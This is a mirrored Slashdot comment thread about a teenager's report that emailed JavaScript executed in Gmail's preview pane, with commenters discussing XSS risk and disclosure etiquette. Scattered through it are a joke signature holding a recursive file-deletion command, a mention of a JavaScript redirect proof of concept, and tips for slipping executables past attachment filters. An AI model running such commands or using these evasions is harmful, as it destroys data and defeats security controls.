Slashdot Mirror
Teenage Blogger Finds Gmail Hole
cpm80 wrote to mention the news that a 14 year old blogger has identified a security hole in the Gmail webmail service. From the Network World article: "He wrote that he was trying to e-mail JavaScript code from a Yahoo account to a G-mail account. The code will run in a preview pane, he wrote. But if the code is mailed from one Gmail account to another, it is filtered out, he said. Some visitors to the blog reported being able to replicate the findings, but others said later that they were not able to and that the supposed flaw had been fixed."
Something happened, he is not sure what, and now nobody can replicate it.
Stuff that matters huh?
SANS Internet Storm Center says it's fixed. Seems pretty silly.
you're all figments of my deranged imagination
I didn't realize this was new. I vaguely remember hearing about this a year or so ago. Actually, it was with any embedded javascript, images, etc.. i think.
I see Windows, I see Mac. I see Linux on the rack.
... it's a testament to the speed of the Google code slingers.
As the old slashdotism proclaims: "Nothing to see here. Move along"
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
You're not dense, the article is...
He wrote that he was trying to e-mail JavaScript code from a Yahoo account to a G-mail account. The code will run in a preview pane...
in *a* preview pane... what preview pane... where? Yahoo's preview pane? How is that google's problem?
I'm totally confused...
Well, it's not like there's a risk of taking down the system with this single bug, but an interesting story nevertheless. I wonder how many of these have been discovered previously?
"I lie right back and turn the radio on..."
nt
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
This error should have been reported to Google and the appropriate mailing lists, not posted on a blog. Fortunately, Google responded quickly to resolve the issue before it caused damage.
- AMW
the code was "supposedly" executed in the preview pane of Gmail.
It could be used for Cross-Site Scripting (XSS), for instance, meaning that someone could send you an email and collect information on you, or make you think you're on google, but really be on another site, etc.
The preview pane is what you see before you read the message (when the list of messages is displayed - e.g. your Inbox).
Utinam logica falsa tuam philosophiam totam suffodiant!
I agree, how is it a security threat if it is removed from the email. Would it not have to be in the email to cause damage. Maybe I just dense too. Someone care to enlighten us.
Art by Mindy Herman, my wife.
Google have shown repeatedly that they don't understand how to deal with Javascript securely. Example.
Bogtha Bogtha Bogtha
This error should have been reported to Google and the appropriate mailing lists, not posted on a blog. Fortunately, Google responded quickly to resolve the issue before it caused damage.
If this was a security expert or professional programmer or the like, I'd agree. But he's 14! Teenagers nowadays can barely open a door without first blogging about the experience. He saw something, he said he saw something. Now he gets a little recognition, Google fixes it and everyone goes home happy.
The claimed security hole is that it is not removed if it's sent from Yahoo mail. Removing the code is the desired behaviour.
Read the article.
It says that when you send an email from gmail, the code is removed. When you send it from Yahoo, the code executes right in the gmail inbox preview. The fact that javascript from the email executes in the gmail inbox is the security hole - anybody can email javascript to you and it will execute without your permission.
But anyway, the hole must be fixed, I can't reproduce the problem, either.
Kid sends email from Yahoo -> Gmail email contains javascript When he cheks his gmail account that email automatically executes the javascript Google has since fixed the problem This was more "proof of concepts", that it would work but a creative javascript code slinger could probably write something for malcious purposes or that could do harm.
I'm all for Google not doing stupid things on their web interface, but I don't think they should be encouraged to be even more agressive and invasive as to what we send and receive in our e-mail. Claiming you are doing this for the users' protection just assumes that all of your users are idiots, and if you build a system that repeatedly makes that assumption then eventually all of your users will be idiots, as you will drive the others away.
I'm an American. I love this country and the freedoms that we used to have.
My first ever first post on slashdot, and I make a typo.
He found a flaw in a piece of beta software. Where's the controversy? It's not like people were running their business off a Gmail account or anything...
For more information, click here.
I'm probably just very very dense, but ... out of the description, how is that a security hole?
Basically - you don't want someone to be able to send you javascript that will execute when you read a message. It can allow the attacker far to much leeway (within the confines of your browser)
Here's an (old) example that affected Microsoft's hotmail service that gives you an idea of why you don't want want javascript sent to you to execute.
Less seriously - it makes it trivial for spammer to verify that someone is opening their spam.
My pics.
Hey Maybe that mail filter should have been for INBOUND javascript in the message body instead of OUTBOUND javascript in the message body. Another injustice perpetrated upon the unsuspecting user base by those merciless hacks at "the brotherhood of the fat fingered sysadmins". :)
What's Gimto?
"I have neither the wit, nor words, nor worth to stir mens blood, I speak only right on". Billy Shakespeare
were good at finding holes to exploit. Any hole.
Er, wait. Scratch that. I'm thinking of something else.
We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
None of the stuff on that page works anymore.
Some visitors to the blog reported being able to replicate the findings, but others said later that they were not able to and that the supposed flaw had been fixed.
Can these same blog visitors please examine and fix my slow computer network?
He who knows best knows how little he knows. - Thomas Jefferson
I guess if someone elses javascript ran while reading Gmail it would be a bad thing. With Gmail (DHTML) most of the headers and some content of your messages are loaded in your browser. Evreything loaded in your browser is a part of DOM which javascript can copy, send or hide or I guess even change. Don't forget though since Google's javascript is also running we don't know for sure if it will let the other script run, crash the browser, slow evreything right down or just do whatever it wants. Theoritically it could copy evrey branch of the DOM and send it as an object but as far as I know javascript can only communicate to the server from which it sources.
A loop, by its nature, continues. If that didn't make sense, start reading this sentence again.
what in gods name are you talking about? sorry, not everything in the world involves 9/11 and in you know, reality, very little actually changed post 9/11
The phrase "more better" is acceptable English. suck it grammar Nazis
In other news, a regular slashdot poster who doesn't get it, that links etc belong to the signature and not to the post itself...
gmail provides a "preview" of each mail (first few words from the body of the mail) in the inbox.
Teenage Computer Geek Finds Hole
Girlfriend says "Finally!"
Find environmentally and socially responsible products on http://buy-right.net
Just last night I had that problem. I renamed the .exe to .ex and zipped it (without any password). I've also used .bat --> .bat.bak in the past.
Anywhere near Cuba?
There are 10 types of people in the world... those who understand binary and those who don't.
Oh, he knows exactly what he's doing. Google "religious freaks." Guess what comes up? Every time he posts a comment and tacks that on the end, Googlebot snags it and bumps it up cos it's coming from a reputable site (well, PageRank-wise at least ;) Slashdot sigs don't have the luxury of being indexed (you gotta be logged in to see them).
This guy's the limit!
Hmm, on September 10, 2001:
The world is run by small-minded militaristic plutocrats with no concern for human life or the future of the planet who rule by intimidation and fear.
On March 2, 2006:
The world is run by small-minded militaristic plutocrats with no concern for human life or the future of the planet who rule by intimidation and fear.
Brave New World, eh?
That summary reads like any number one of my first attempts at writing:
I said "I'm hungry".
"How come?" Bill said.
"I didn't eat," I said.
Bill said, "That stinks."
I said "It sure does".
http://www.nsgtmo.navy.mil/nsgtmohome.htm
There are 10 types of people in the world... those who understand binary and those who don't.
No, the security hole is that gmail will execute javascript in e-mail. You can't assume that all clients on the web will filter out javascript before sending them gmail's way.
A big gaping hole is found in Zonk's head.
Sorry, but you are wrong. The treatment of group nouns as plural is perfectly normal and acceptable outside of America. Consult your international grammar nazi style guide for details.
Bogtha Bogtha Bogtha
Gmail blocks outbound attachments with exe files, even when those files are included inside zip files.
.exe to .abc, ZIP it and rename the .zip extension .xyz our system will check the header content of the files' data and determine it is a ZIP, then extract the files inside to examine THEM if that is how you configure it.
.docs since I consider then "executable"--I send PDFs instead), smaller files and so on. For dealing with more novice users I send an email with the link to the file to click, and for getting files from them I set up a simple HTTPS "gateway" with a file submission form. Just as simple as attachments (for the client anyways) and more secure.
Google is RIGHT in doing such filtering, although perhaps they should make it clear to users up front on its filtering policies rather than waiting for them to discover it for themselves. Besides, even if outbound executable attachments are blocked how many corporate systems permit them inbound? My employer blocks inbound executables unless you're in certain departments, and the majority of our clients do as well. These systems are getting very smart too--they analyse the actual content of the file rather than the extension and even if you rename your
The point is that email was not designed for file transfer and probably will never be the best tool for that purpose. Unfortuantely it cannot always be avoided but it should be whereever possible. If email was seen as a good way to transfer files then FTP wouldn't have been invented--people would've extended email to do it from the start. Since FTP is still around today and is now extended to secure FTP with SSL encryption and authentication THAT is the tool that professionals should use to send such files (that is what I do anyways).
There are some cases where email is the most convenient, such as for non-executable documents (I avoid sending
I don't think GMail and other mail systems need to be "fixed"...I think that people have to get out of the mindset of using email to exchange files. Use secure FTP or even HTTPS...or even better for big files use Bittorrent. It annoys me when people complain about limits on email attachments just like it annoys me when people use Excel to create "databases". At least learn to use MS Access dammit...it isn't THAT hard!
If the kid was looking to better humanity, he probably would have reported the flaw to Google before blogging on it. He should read the RFPolicy before he ends up being a scapegoat under someone's corporate bus.
What about the sole (both administrator and technical) contact for the entire Iraq domain?
script type="text/javascript" language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/s how_ads.js"
...instead of the appropriate ad.
Any healthy kid online would be hitting the pron!
Engineering is the art of compromise.
No, it's closer to Flordia.
120 characters for a sig? That's bloody useless.
You mean somewhere in the Caribeban?
How can a post be modded "overrated" or "underrated" when it hasn't been rated yet?
Iraq's a beta country: occasional big glitches here and there, but some people seem to trust in it a lot more than others. It seems only natural that they'd rely on a beta e-mail service. :)
For more information, click here.
by the time you finished typing your comment, 2 newer distros were released. man, you must practise and go beyond 60 wpm!
And this is news why? In another related story, teenager stubs toe and blames Microsoft and Google China Who cares.
I am scared by how many of my clients are using one AOL, Earthlink, Gmail, Hotmail, etc. mailbox for their entire company.
And I know exactly that he knows exactly what he is doing. There were other people adding their links like him until they got modded down for it. So moderators, stand up.
The kid's code might be deadly, but after reading his blog, I notice he can barely formulate a coherent English sentence.
- P
Geez! Please! Use your sarcasm tags!
Its been shown that you could Email someone a redirect, so anytime they view their inbox (using non standard HTML mode) it would send them to the link you provide.
There is a bug in a piece of beta software??? That is unheard of.
Johnkoerner.com
Oddly, it's in Cuba.
www.joshferguson.org
God I cant stand that fucking word!
Die pls!
Also he's 14, post pic pls!
Slashcode doesn't even put in rel=nofollow. Why isn't there more link spam here?!?
new. not newest.
welcome to missing the joke
drive carefully.
my password really is 'stinkypants'
it certainly underscores a strength of web based applications: It was looking like a bug one morning but by afternoon, only fixed versions of the code were to be found. Centralized reloading of gmail's servers means everybody got the fix at the same time more or less. What would the time line of such a security hole be if it occured in Outlook? Eudora?
SLASHDOT: news for people who can't concentrate on work or have no life at all and got tired of yelling back at the TV.
This story actually broke on Digg.com by the way, not mentioned in the summary.
Obviously you don't know anything about javascript. Go to www.google.com and type in XSS and you will find your answer.
Obviously you didn't read enough, its been proven and shown to work already, by sending a document.location='yahoo.com'; redirect users were sent to yahoo.com everytime they viewed their inbox. Go read the digg.com comments.
Because of XXS Scripting attacks, I imagine.
find / -name "*.sig" | xargs rm
What does running Javascript "from gmail.com" even mean? Javascript is run on a client machine. So you can put Javascript in your code, and it will parrot it back to you. How exactly is this a security vulnerability? You could run the same code from anywhere - it doesn't have to be Gmail.com supplied Javascript code. Please correct me if I don't understand, but if he just got gmail to give him back his own javascript code, there is no vulnerability. How is it going to run "from the gmail servers"? And even if it COULD do that, how do we know gmail hasn't sandboxed it in some manner?
I should just post shit like "Hotmail.com vulnerability found!" all the time. Maybe I could garner this kind of media attention.
Did you ever notice that *nix doesn't even cover Linux?
THANK YOU!
You stated that in clear terms that hopefully everyone else understands. I read the article, but saw too many posts saying "so what?" or "thats not a security breach."
How much is your data worth? Back it up now.
I, for one, welcome our new 13-year old hacker overlords.
Error #13: No coffee. Operator halted. Please place boot device at bottom.
...you have a gmail account, for example. In the long run, I always prefer to get more information, rather than less. The people complaining about this story being on /. can simply choose not to read it. If you don't like what's on, change the [website].
Besides, the point isn't the "size" of the bug or it's potential to cause damage. The "point", and the benefit, of an article such as this one is that when people make others aware of problems in a company's product, it allows said people to make a more educated decision on using or not using the product. In addition, when a company's products are consistently shown to be problematic in some fashion and the company is shown to ignore said problems regularly, this also allows a consumer to steer clear of a company that doesn't hold their customer's best interests at heart.
"First they ignore you, then they laugh at you, then they fight you, then you win."
-Gandhi
You figured out my social experiment / hack! (I'm not kidding) How do you get Slashdot to post a story? I figured slashdot would run any story about Google. Excellent.
"Hacked his own computer" is not worth any street cred.
So it instead becomes "Hacked the Fed, transferred $9bn to my Swiss account and I'm leaving the country scot-free!"
Sig for hire.
What is so hard about this? Its very obvious to see the security risks associated with this vulnerability. And yes, it is a vulnerability. Are all the previous posters the same guys from Microsoft who sat in a board room, straight faced, and decided letting other people run C++/Java code on your Internet Explorer window would be a GOOD idea?
Way to go! You just set up tomorrow's "Google has a security hole" Slashdot story. You get +1 Foresightful. :)
-- What you do today will cost you a day of your life.
I can think of plenty of changes that happened as a result of 9/11, mainly that idiots whom we'd spent years beating into silence suddenly felt at liberty to speak up again. Many of them working for the government.
Pfft, just use a mail client like Thunderbird or kmail.
Change is certain; progress is not obligatory.
how often do you coders send your code in the body of an email message?? i mean, are CVS's, RDS's and hell, even throwing your shit in a zip file that outdated already??
*plays the Apogee theme song music*
You're unable to executing arbitrary javascript in *someone else's* browser because Google filters it out? In other news, banks foil bank robbers by storing money in large metal boxes.
This is one Gmail bug I see of late... I get mails with lots of pics in it forwarded by friends to my gmail account without a problem.However when I forward it to any other email address [ including to my own Gmail address] , only the text appears & the pics dont (only rectangles with 'X' appear]. I have been having this problem for the last 1 week or so only. has any one of you come across such a problem too?
Why does yahoo do this
Any limitations on "servers" by shortsighted and greedy ISPs are artificial restrictions on already capable technology.
Unfortunately, "shortsighted and greedy ISPs" who impose "artificial restrictions on already capable technology" are the norm, and if both the local telephone company and local cable company charge exorbitant rates to lift the TOS restrictions, then you're going to see continued use of either e-mail or web space to transfer files.
if you attach a large file to email, then hit send, you STILL have to be online for the entire duration it is moved to the email server. If you had to be the first seed for a torrent you wouldn't have to be online for that much longer.
The difference is that once you click send in an e-mail, FTP, or HTTP user agent (or in any other store-and-forward system), you wait only for the e-mail program to report that it has finished encoding and transferring the file. In BitTorrent, on the other hand, you have to leave your computer dialed up to the Internet (and miss voice telephone calls) until the intended recipient replies that he or she has received the file.
we'll continue to have people try to ... use email like instant messaging (or vice versa, deliberately leaving big IMs when they KNOW the recipient is offline)
The difference is that IM spam is perceived to be less common than e-mail spam, which in my experience tends to make it past even SpamAssassin too often.
And before the software developers get overly ornery about not being able to email binaries to each other, or code trees that contain binaries, I will happily recommend Sourceforge to them. (www.sf.net)
Not all software is 1. intended for consumption by the general public, 2. Free, and 3. in one of the specific categories of functionality that SourceForge.net accepts. Or did you mean installing GForge or SourceForge Enterprise Edition on a server controlled by the developer?
I can't say "Hey, give me your FTP address, and I'll send you that file".
So say "Here is my FTP address; log in anonymously and get the file." Or, equivalently, "I've uploaded the file to my web space; go to this URL to get the file."
The lazy people are the people who don't go to enough effort to install secure software.
Unfortunately, the lazy people are the majority, and you are the minority.
I actually pay an ISP every month, and use Eudora to send and receive mail. And nobody censors me.
You are lucky to have been born in a town whose local mono- or duopoly residental broadband ISP does not censor your attachments. Had you been born in an SBC state (now at&t), you might have got stuck with Yahoo! mail and all its restrictions, as SBC has partnered with Yahoo! for quite some time now.
My clients won't know its an email address if they don't see 'hotmail' or 'yahoo' on my business card
Wouldn't the commercial at sign ('@') be enough to clue them in?
the '....' denoted sarcasum
If you want your ironic message to cross the sar-chasm intact, it's best to use well-known protocols. Better-recognized end tags for sarcasm are ;-) or </sarcasm> (written as </sarcasm> in Slashdot comment markup).